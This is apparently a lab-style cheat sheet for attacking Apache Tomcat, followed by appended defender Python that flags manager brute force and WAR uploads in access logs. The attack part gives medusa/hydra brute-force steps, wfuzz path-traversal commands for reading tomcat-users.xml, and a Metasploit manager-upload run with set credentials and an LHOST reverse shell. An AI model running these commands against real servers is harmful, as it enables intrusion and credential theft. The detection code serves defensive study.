Apache Tomcat
Reconnaissance
ping
nmap
URL
- http://$IP:8080/manager/status
- http://$IP:8080/manager/html
- http://$IP:8080/host-manager/html
Bruteforce attack
user.txt
pass.txt
medusa – /manager/status
hydra – /manager/status
medusa – /manager/html
hydra – /manager/html
medusa – /host-manager/html
hydra – /host-manager/html
Enumeration users.xml
path.txt
etc
conf
var
lib
ROOT
usr
share
doc
opt
tomcat7
tomcat8
tomcat9
webapps
tomcat7-common
tomcat8-common
tomcat9-common
wfuzz -c -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/tomcat-users.xml --hl 0
wfuzz -c -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZ2Z!=FUZ3Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/tomcat-users.xml --hl 0
wfuzz -c -w path.txt -w path.txt -w path.txt -w path.txt --prefilter "FUZZ!=FUZ2Z and FUZZ!=FUZ3Z and FUZZ!=FUZ4Z and FUZ2Z!=FUZ3Z and FUZ2Z!=FUZ4Z and FUZ3Z!=FUZ4Z" -u http://$URL/news.php?file=../../../../FUZZ/FUZ2Z/FUZ3Z/FUZ4Z/tomcat-users.xml --hl 0
Exploitation
exploit 1 – metasploit
use exploit/multi/http/tomcat_mgr_uploa
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run
exploit 2 – shell.war
payload
listener
exploit 3 – shell.war
payload
listener
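The password guessing against /manager/html and /host-manager/html in the Bruteforce section and the WAR upload through the manager in exploit 1 both leave a recognisable trail in Tomcat's access log. The following Python is added here as a defender-side example and is not part of the original cheat sheet; it assumes the default AccessLogValve "common" pattern and the manager upload/deploy endpoints, and runs over a constructed sample log.

```python
import re
from collections import defaultdict
from datetime import datetime
# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b (assumed)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$')
MANAGER_PREFIXES = ("/manager/", "/host-manager/")
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
# Constructed sample log: a password-guessing burst against /manager/html
# from one host, a successful login, a WAR upload, and a normal admin request.
SAMPLE_LOG = [
    '10.10.14.16 - - [12/Mar/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.16 - - [12/Mar/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.16 - - [12/Mar/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.16 - - [12/Mar/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.16 - - [12/Mar/2024:10:00:03 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.16 - tomcat [12/Mar/2024:10:00:04 +0000] "GET /manager/html HTTP/1.1" 200 11234',
    '10.10.14.16 - tomcat [12/Mar/2024:10:00:09 +0000] "POST /manager/html/upload?x=1 HTTP/1.1" 302 -',
    '10.10.10.5 - admin [12/Mar/2024:10:05:00 +0000] "GET /manager/status HTTP/1.1" 200 9876',
]

def parse_line(line):
    # Parse one access-log line into a dict, or return None if it does not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec

def detect(lines, threshold=5, window_s=60):
    """Map source IP -> set of findings: 'bruteforce' when >= threshold 401s hit
    manager paths within window_s seconds, 'deploy' for an accepted POST/PUT
    to a manager deploy endpoint (what a WAR upload leaves behind)."""
    failures = defaultdict(list)
    findings = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(MANAGER_PREFIXES):
            continue
        ip = rec["ip"]
        if rec["status"] == 401:
            recent = [t for t in failures[ip] if (rec["ts"] - t).total_seconds() <= window_s]
            recent.append(rec["ts"])
            failures[ip] = recent
            if len(recent) >= threshold:
                findings[ip].add("bruteforce")
        elif rec["method"] in ("POST", "PUT") and rec["path"] in DEPLOY_PATHS:
            findings[ip].add("deploy")
    return dict(findings)
```

Tune `threshold` and `window_s` to the site's normal admin behaviour; a legitimate operator rarely produces five 401s on the manager within a minute.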